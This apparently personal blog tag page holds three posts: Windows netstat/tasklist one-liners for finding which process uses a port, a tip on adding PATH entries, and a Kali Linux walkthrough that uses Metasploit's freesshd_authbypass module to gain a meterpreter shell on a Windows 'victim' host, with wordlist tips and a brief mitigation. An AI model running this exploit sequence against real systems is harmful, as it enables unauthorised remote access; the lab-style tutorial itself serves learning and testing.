Top
JohnKlann / Posts tagged "cygwin"

## How to check if a port is in Use and What Process is running on it

So really simple way to check if a port is in use and by what process.

1. Method 1 CMD:
netstat -ano | findstr "portnumber"


3. Example using default rdp port:
netstat -ano | findstr "3389"

4. Output:

Method 2 PowerShell:

1. Command:
&amp;nbsp;netstat -ano | findstr "portnumber" | Select-String -Pattern "\d+$" -AllMatches | % {$_.Matches } | foreach { tasklist |select-string -Pattern $_.Value } | Get-Unique  2. Example using port 80: 1. Note: this could probably be a lot cleaner but hey i did it in 5 minutes in 1 oneline !  netstat -ano | findstr "80" | Select-String -Pattern "\d+$" -AllMatches |  % {$_.Matches } | foreach { tasklist |select-string -Pattern$_.Value } | Get-Unique

3. Output:

Method 3 CMD with Cygwin:

1. This will get all of the process running on a particular port.
1. Note: you will need (Cygwin bin directory pathed in your environment See how to do this here: How to add environment Paths via command line (cmd, powershell) )
1. Command:
 for /f "delims=" %a in ('netstat -ano ^| grep "portnumber" ^| grep -m1 -oP "[\d]{1,6}$"') do @set pid=%a | tasklist | grep %a  2. Example using port 80:  for /f "delims=" %a in ('netstat -ano ^| grep "80" ^| grep -m1 -oP "[\d]{1,6}$"') do @set pid=%a | tasklist | grep %a
3. Output:

## How to add environment Paths via command line (cmd, powershell)

Here’s a quick one lol.

Quick Note: This will temporarily set the Environment path with in that shell. If you want a more permanent solution you will have to added through windows environment variables config then logoff and back in.

1. In CMD or Powershell prompt Run this command:
1. Syntax:
 PATH %PATH%;c:\path\you\want\to\add\
2. Example Using Cygwin Bin directory:
 PATH %PATH%;c:\dev\cyg\bin\
3. Output:

## Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

start: mfsconsole in kali

msfconsole

search: ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

run: exploit

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.